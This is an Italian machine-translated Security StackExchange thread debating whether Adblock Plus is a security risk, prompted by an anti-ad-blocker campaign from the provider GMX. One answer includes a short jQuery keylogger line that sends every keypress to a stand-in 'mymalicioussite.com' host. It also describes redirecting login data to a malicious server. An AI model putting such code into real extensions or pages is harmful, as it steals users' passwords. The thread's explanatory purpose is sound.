Domanda:
Adblock (Plus) è un rischio per la sicurezza?
Tobias Kienzler
2014-02-27 13:25:32 UTC
view on stackexchange narkive permalink

Il sito web del mio provider di posta elettronica ( http://www.gmx.de ) ha recentemente iniziato a collegarsi al sito (tedesco) http://www.browsersicherheit.info/ che sostanzialmente afferma che a causa delle sue capacità di modificare l'aspetto di un sito, Adblock Plus (e altri) potrebbe effettivamente essere abusato per phising. Ecco una citazione da quel sito e la sua traduzione:

Solche Add-ons ha Zugriff su Ihre Eingaben im Browser e können diese auch an Dritte weitergeben - auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

tradotto:

Tali componenti aggiuntivi possono accedere a tutti gli input del browser e possono anche inoltrarli a terze parti, anche al tuo password bancaria. Questo può accadere su tutti i siti web. I meccanismi di sicurezza come SSL non possono evitarlo.

Ok, menzionano altri componenti aggiuntivi (abbastanza ovviamente crapware), ma Adblock Plus è davvero una minaccia per la sicurezza o gli operatori di quel sito semplicemente usano l'opportunità per provare a spaventare gli utenti inesperti facendogli visualizzare di nuovo i loro annunci?

Questo si riduce a: non eseguire applicazioni di cui non ti fidi. Se Adblock fosse malvagio, potrebbe rubare i tuoi dati di accesso. Se qualsiasi altro eseguibile che esegui fosse malvagio, potrebbe farlo anche tu.
Solo per amore dell'umorismo: perché non usi Ghostery? ;-)
Puoi chiarire la domanda? Stai chiedendo se Addons come Adblock potrebbe _ teoricamente_ essere un rischio per la sicurezza, o stai chiedendo se Adblock è _attualmente_ un rischio per la sicurezza?
@MooingDuck Buon punto: sto chiedendo di _currently_, poiché in teoria dovrebbe essere chiaramente possibile, giusto?
Mi chiedo quanti utenti abbiano iniziato a utilizzare Adblock Plus dopo aver letto tutti gli articoli a riguardo? Alcune entità dovrebbero davvero considerare l '[effetto Streisand] (http://en.wikipedia.org/wiki/Streisand_effect) prima di iniziare una campagna di ricatto.
** Aggiornamento: ** Gli amministratori del sito FUD (o lo stesso Adblock :) nel frattempo hanno rimosso gli adblocker dalla lista dei "cattivi" (oh caro, solo la creazione di parole mi fa pensare ai B-movie). Inoltre, Adblock ora mi ha offerto la possibilità di nascondere i banner FUD sulla homepage di GMX. Immagino che non sia esattamente l'effetto che speravano ...
Per essere onesti, c'è stato un gran numero di cloni di blocco degli annunci di malware nel webstore di Chrome. Ne ho segnalati alcuni prima e alla fine li ho eliminati, ma ora mi sono arreso. Alcuni sono arrivati ​​al punto di copiare le descrizioni esatte e le icone dalle estensioni di blocco degli annunci legittime per ottenere risultati. Non riuscivi a distinguere tra "Adblock" e "Adb1ock". Quindi con tutte le false valutazioni a 5 stelle ... è difficile dire cosa sia effettivamente legittimo. Basta guardare tutte le estensioni "Adblock for XXX" che dichiarano di funzionare e tutti i commenti che affermano il contrario. Sii intelligente su ciò che scarichi le persone.
@JeffMercado Non è quindi un problema serio con il webstore di Chrome? Non ricordo che siano successe queste chiacchiere su Mozilla ...
Lo è, sicuramente. Sto solo dicendo che le persone possono essere fuorvianti nel pensare che questi cloni provengano dai creatori delle versioni legittime di blocco degli annunci. Potrebbero pensare che il clone di adblock fosse una truffa, quindi tutti gli adblock (clone o meno) sono truffe. È possibile che qualcuno alla GMX sia stato scottato da questo e senza fare davvero ricerche su questo, spinto per questa campagna.
Dopotutto, è un software open source che dovrebbe risolvere questo problema una volta per tutte.
Al contrario, Adblock è una forma di sicurezza. Prima di installarlo su Android, sono stato bombardato da annunci che mi chiedevano di installare l'app di un inserzionista.
@TheRookierLearner potresti espandere Ghostery, per favore?
@Federico Fondamentalmente mostra e consente di bloccare qualsiasi tracciamento, aggiunta e fastidio di parti di siti Web: https://www.ghostery.com/
Tobias, lo so e lo uso, me lo chiedevo perché la domanda di @TheRookierLearner sembrava sarcastica e non riuscivo a capire.
@Federico Penso che il loro punto fosse quello di suggerire beffardamente di utilizzare un altro componente aggiuntivo per verificare quanto sia affidabile il blocco degli annunci, che semplicemente delega la fiducia di quelli dall'adblock alla ghosteria ...
@Federico - Sì, sto davvero suggerendo un altro componente aggiuntivo. In una nota diversa (circa il punto che ci sono più componenti aggiuntivi), se cerchi le estensioni di Google Web Store per "adblock", otterrai molti risultati come "adblock pro", "adblock premium", "adblock plus" (e l'elenco potrebbe continuare) e non sai qual è quello legittimo. Cerca "ghostery" invece, ottieni solo un'estensione. Non sono un fan della ghosteria, ma per qualche motivo non sembra avere più estensioni di copia (e non crea confusione quale "adblock" crea)
Per rispondere, sono andato sul sito Web di Ghostery e ho trovato questo: "Inoltre, il suo sito Web afferma chiaramente:" Ghostery non raccoglie dati per impostazione predefinita. Puoi scegliere di inviarci i dati abilitando la funzione Ghostrank. `(Maggiori informazioni nella loro dichiarazione sulla privacy, EULA e FAQ). Ancora una volta, voglio solo affermare che non sono un fan o un promotore di Ghostrey (in effetti a volte interrompe alcune pagine e non blocca gli annunci su YouTube) ma non ha la confusione (o altre schifezze come "accedere input dell'utente ") come nel caso di altri ad-blocker.
Ho solo pensato che fosse importante condividerlo. Dopo aver utilizzato adblock plus ho avuto problemi di malware. Avevo adblock installato sul mio Android. Ho il telefono da oltre un anno senza problemi. Dopo aver utilizzato adblock, ogni volta che sblocco lo schermo verrà visualizzato un popup sul sito di adcasch. Era molto sospetto perché appare nel browser predefinito del mio telefono che non uso mai. Uso sempre e solo un Chrome installato di terze parti. Ho un antivirus sul mio telefono. Ha scansionato e non ha trovato minacce. Sospettavo il blocco degli annunci poiché era l'ultima app scaricata che dava così tante autorizzazioni all'app. Ho disabilitato l'app nel mio file
Nella migliore delle ipotesi questa è una prova aneddotica. Sei sicuro di aver installato The real AdblockPlus da adblockplus.org? Questa non è davvero una risposta (ancora).
Solo condivisione: ho smesso di usare Adblock Plus perché in quel momento consumava troppe risorse sul mio computer.Ora utilizzo sempre la mia [VPN personalizzata] (https://github.com/hwdsl2/setup-ipsec-vpn), quindi l'ho impostato come server DNS e ho risolto [l'annuncio noto e gli host di monitoraggio] (https://github.com/StevenBlack/hosts/blob/master/hosts) a "0.0.0.0".Problema risolto: annunci e monitoraggio disattivati in modo discreto a livello di rete su tutti i miei dispositivi configurati per utilizzare questa VPN.
Nove risposte:
#1
+224
Andalur
2014-02-27 15:57:50 UTC
view on stackexchange narkive permalink

Non lo è. Questa è una campagna FUD ( paura, incertezza e dubbio) di GMX perché desidera visualizzare i propri annunci. Non vi è assolutamente alcun rischio per la sicurezza dai citati ad blocker. Hanno aggiunto un po 'di crapware all'elenco per farlo sembrare più legittimo.

Ovviamente tali campagne sono molto insolite, specialmente da un'azienda così grande e ben nota come GMX. Sfortunatamente, non ho a portata di mano una fonte in inglese (perché è una campagna solo in tedesco) ma poiché parli tedesco potresti leggere questo articolo su heise.de.

Aggiorna # 1: United Internet, la società dietro GMX, ha ricevuto molte critiche per aver ingannato i clienti sostenendo falsamente che esiste un rischio per la sicurezza sul proprio PC. Il Wall Street Journal (edizione tedesca) ha chiamato gli avvisi visualizzati su GMX e il sito che collegano a una "campagna spaventosa".

Aggiornamento n. 2: GMX ora dice che lo faranno non visualizza più il collegamento quando si utilizzano i blocchi degli annunci, ma lo visualizzerà comunque se si utilizza crapware che inietta pubblicità, l'elenco sul sito http://www.browsersicherheit.info/ è stato aggiornato di conseguenza e ora elenca solo una piccola raccolta di crapware. Questo elenco non è affatto completo, quindi non è una fonte affidabile quando vuoi sapere se il tuo browser ha installato crapware. Tuttavia, United Internet mantiene ancora la posizione di non volere che gli utenti che visitano i loro siti utilizzino il blocco degli annunci e ha affermato che svilupperanno altri metodi di blocco in futuro ( fonte tedesca).

Grazie per il link, si riduce sostanzialmente alla tua risposta e prosegue spiegando che questa campagna non è sorprendente dopo [l'annuncio di citare in giudizio Eyeo a causa della loro funzione "Aggiunte accettabili" (link anche in tedesco)] (http: / /www.heise.de/newsticker/meldung/Acceptable-Ads-Werber-wollen-offenbar-Adblock-Plus-verklagen-2104273.html) - a quanto pare il FUD è basato su [un incidente di Chrome] (http: // arstechnica. com / security / 2014/01 / malware-vendors-buy-chrome-extensions-to-send-adware-filled-updates /)
Di chi ti fidi di più? ABP (che è sotto costante controllo e verrebbe lanciato a vapore se sostituisse mybank.com con qualcos'altro) o Some Random German Company? POTREBBE essere utilizzato un addon per `scopi malvagi`? Certo ... ma senza prove sono solo accuse cieche e FUD.
@WernerCD GMX è un importante provider di posta elettronica, uno dei principali provider non Gmail. Non è "una compagnia tedesca a caso". E, di tutti i paesi, un'azienda * tedesca * è quella di cui decidi di diffidare?
@Superbest GMX e altri provider di posta elettronica tedeschi gestiscono anche la campagna "E-Mail made in Germany" in cui inducono i clienti a pensare che le e-mail inviate tramite i loro server di posta siano al sicuro dalla sorveglianza.
@Superbest Beh ... se non è una società americana, allora è un'altra compagnia casuale. .. ... scherzo, scherzo. Ma seriamente, direi lo stesso per la maggior parte delle aziende e direi lo stesso se Comcast o Google mi dicessero di smettere di usare ABP. Devi alzare un sopracciglio quando un'azienda che trae profitto dalla pubblicità ti dice di smettere di usare un blocco degli annunci.
È davvero un po 'disonesto dire che non c'è nessun rischio del cazzo. Tuttavia, i [rischi sono abbastanza piccoli] (http://security.stackexchange.com/a/52411/4906) con cui sono d'accordo che questa non è altro che una campagna FUD.
La società dietro AdblockPlus (Eyeo) è piuttosto dubbia [1], quindi avvertire gli utenti in generale potrebbe essere ragionevole. Tuttavia, addon come Adblock Edge [2] che utilizzano (per quanto ne so) solo codice open source basato sull'originale Ablock sembrano essere più sicuri. Quindi, osservando il design del messaggio di avviso, sono anche d'accordo sul fatto che si tratta principalmente di una vivace campagna FUD intesa ad aumentare nuovamente le entrate pubblicitarie. [1] http://www.mobilegeeks.de/adblock-plus-adblockgate-eyo-gmbh/[2] https://addons.mozilla.org/de/firefox/addon/adblock-edge/
@Superbest "_Non è" una compagnia tedesca a caso "._" Ma ADB è conosciuto in tutto il mondo (come Google). Uno scandalo che coinvolgesse ADB sarebbe una grande notizia per il mondo.
Una campagna FUD di questa portata può essere "insolita", ma i siti che dicono qualsiasi cosa e tutto il possibile per visualizzare i propri annunci non sono certo un fenomeno recente. Alcuni siti piccoli e indipendenti rilevano il blocco degli annunci e richiedono cortesemente di disabilitarlo sul loro sito perché si basano sulle entrate pubblicitarie. E poi ci sono i principali siti aziendali come www.denverbroncos.com, che mostra un banner che afferma: "Abbiamo notato che potresti avere attivato un blocco degli annunci. Tieni presente che il nostro sito funziona al meglio con i blocchi degli annunci disattivati". senza mai giustificare quella dubbia affermazione. "Il migliore" per CHI?
FUD può essere vero! È davvero un rischio. Il software di terze parti può fare molto se non tutto (forse attraverso un hack a cui ti esponi) sul tuo computer. Un piccolo rischio visto quello che sta succedendo. E poiché è un rischio così piccolo è FUD. Ma FUD può essere vero.
#2
+111
Code Whisperer
2014-02-27 22:14:58 UTC
view on stackexchange narkive permalink

Dopo averci riflettuto, sono d'accordo con le altre risposte in quanto, nonostante PUO 'accedere ai tuoi dati, Adblock è più è probabile che protegga la tua privacy piuttosto che invaderla. Il rischio reale sono annunci dannosi che ti chiedono di installare software sul tuo computer. Adblock li impedisce.

Di seguito è riportata la risposta originale e cautelativa:

Sì, lo è totalmente.

Adblock Plus è un estensione / componente aggiuntivo del browser sviluppato da uno sviluppatore indipendente. Adblock può accedere al DOM (document object model) su tutte le pagine.

Il modo in cui funziona AdBlock è che inietta uno script nel tuo browser, che cerca nel DOM, quindi esegue un hide () su ciò che determina sono annunci.

Ciò significa che AdBlock (e qualsiasi estensione di Chrome con tale autorizzazione) può accedere al tuo DOM. Adblock non può accedere alle variabili JavaScript.

Cosa significa?

Se ti trovi su un sito Web con autenticazione sicura e c'è un oggetto JavaScript con qualcosa di privato come una AuthKey, sei sicuro . AdBlock non può accedere alle variabili JavaScript.

Tuttavia, AdBlock PU eseguire un codice equivalente a questo.

$ (window) .onKeyPress (function (e) {$ ('html' ) .append ('<img src =' http: //mymalicioussite.com/stealData/keyPress.png? key = '+ e.keyCode)})

Che essenzialmente instraderà qualsiasi chiave premi su un server remoto.

Questo può essere usato per rubare la tua password, il che è anche peggio del furto del tuo token.

Detto questo, AdBlock è pericoloso?

Mi sembra che AdBlock non sia eccessivamente pericoloso in quanto lo sviluppatore si è identificato ed è utilizzato da milioni di persone. Se stesse facendo il tipo di complicazioni come sopra, qualcuno probabilmente l'avrebbe notato e avrebbe fischiato.

Ma non pensare che le estensioni di Chrome siano totalmente sicure. Tutti possono rubare qualsiasi dato, così come altre cose dannose.

Che altro può fare?

Un'estensione di Chrome può anche eseguire le seguenti violazioni della sicurezza in modo abbastanza banale ...

  • Indirizza il contenuto di qualsiasi email o pagina che leggi a una fonte di terze parti (se questa email contiene caratteri non crittografati informazioni di accesso, vieni beccato) Se riesci a vederlo sullo schermo, lo stesso vale per qualsiasi estensione di Chrome, senza fare domande.
  • Inserisci le informazioni in un campo e premi il pulsante di invio, ad esempio, invia una e -mail
  • Se lasci il browser aperto e l'estensione sa come, può utilizzare la tua interfaccia di posta elettronica (Gmail, Outlook) per inviare e-mail di sua scelta ai tuoi contatti. Questo è banale.
  • Cambia lo script associato a qualsiasi pulsante, se originariamente inserito con jQuery. Ad esempio, il pulsante che invia le informazioni di accesso al server può essere leggermente modificato per inviare tali informazioni sia al server che a http: // mymaliciousserver . Questo è banale.

Aggiorna

È stato verificato attraverso la discussione che AdBlock è open source. Questo dovrebbe farti fidare di più di AdBlock, ma ricorda che è ancora capace di fare queste cose. Ho esaminato la fonte e posso tranquillamente affermare di non avere idea di cosa stia succedendo.

Fonte: sono uno sviluppatore di JavaScript e di estensioni per Chrome.

Si tratta solo di un blocco degli annunci ... Ci sono molti diversi blocchi degli annunci nell'elenco e usano molti metodi diversi di blocco, penso ...
Se si tratta di un'estensione di Chrome e gli consenti di accedere ai tuoi dati su tutte le pagine, può fare tutte queste cose. Quasi tutte le estensioni di Chrome richiedono questa autorizzazione, e con AdBlocker è necessaria anche per funzionare, se ci pensi.
AdBlock Plus non era open source? (;
Link @FranciscoPresencia per favore?
@itcouldevenbeaboat https: // adblockplus.org / en / contrib-code
Ottima risposta sul _potenziale_ dei componenti aggiuntivi, anche se IMHO titolo un po 'troppo spaventoso (sto usando Firefox btw, ma immagino che quasi lo stesso si applichi lì)
Dai un voto positivo sia per una buona risposta (indipendentemente dal fatto che un'applicazione lo faccia, questo è lo scambio di stack di sicurezza delle informazioni e tali domande meritano risposte dettagliate) sia per il nome ... cosa c'era nella confezione?
Il collegamento è già stato pubblicato da @TobiasKienzler. Inoltre, un suggerimento era il grande segno verde nella [pagina principale] (https://adblockplus.org/) che diceva * Open Source *.
@TobiasKienzer Questo è fantastico. Scusatemi mentre forco AdBlock e inizio il mio progetto di AdTeese, che sostituisce ogni aggiunta con una pin-up di dimensioni di Dita von Teese.
"open-source" non significa nulla se la fonte che stai guardando non è la stessa fonte utilizzata dall'estensione. Ho pubblicato il [visualizzatore dell'origine dell'estensione di Chrome] (https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin/reviews) che consente di visualizzare l'origine reale di un'estensione (= quello che verrà utilizzato quando installi un'estensione). Ovviamente, devi fidarti che l'estensione fa quello che promette, cioè mostra il codice sorgente corretto invece di uno censurato. Tutto si riduce a "installare solo software di editori di cui ti fidi").
@itcouldevenbeaboat Per favore, lo userei :-)
@TobiasKienzler Sembra che [Firefox abbia un processo di revisione più rigoroso] (http://arstechnica.com/business/2014/01/seeking-higher-ground-after-chrome-extension-adwaremalware-problems/) che sembra avere un [ maggiore attenzione alle revisioni manuali] (https://wiki.mozilla.org/AMO:Editors/EditorGuide/AddonReviews). Ovviamente, non è infallibile (e viene fornito con tempi di aggiornamento più lunghi in attesa dell'approvazione), ma potrebbe essere più di Chrome: Google non è molto esplicito su come revisionano.
Non esiste un "* oggetto JavaScript con qualcosa di privato *", a meno che non sia inutile. Anche se un plugin non accede alle variabili locali, una volta che ha accesso alla pagina (DOM, iniezione di script) può compromettere tutto ciò che accade con JS, poiché tutte le interfacce degli effetti collaterali sono pubbliche.
Questa è un'ottima citazione che potrebbe essere applicata alla maggior parte dei software: "Ho esaminato la fonte e posso tranquillamente affermare di non avere idea di cosa stia succedendo".
@Bergi In realtà, le estensioni di Google Chrome vengono eseguite in una sandbox VM e non possono accedere alle variabili JavaScript sulla pagina con qualsiasi mezzo che conosco.
@itcouldevenbeaboat un'estensione può utilizzare uno script di contenuto per iniettare un elemento di script nel dom, che verrà eseguito nel contesto javascript della pagina web.
@itcouldevenbeaboat [Content scripts] (https://developer.chrome.com/extensions/content_scripts) * non * vengono eseguiti in una macchina virtuale. I contesti di esecuzione JavaScript sono effettivamente separati, ma il DOM è condiviso. Di conseguenza, gli script di contenuto possono eseguire codice nel contesto della pagina Web inserendo tag di script, eseguendo gestori di eventi, ecc.
@RobW Questo è interessante. Puoi descrivere un modo per accedere a una variabile di finestra su una pagina, ad esempio "myVariable", da un'estensione di Chrome, e lo controllerò?
@itcouldevenbeaboat Vedi le risposte e le risposte collegate su http://stackoverflow.com/q/9515704
Può inserire tag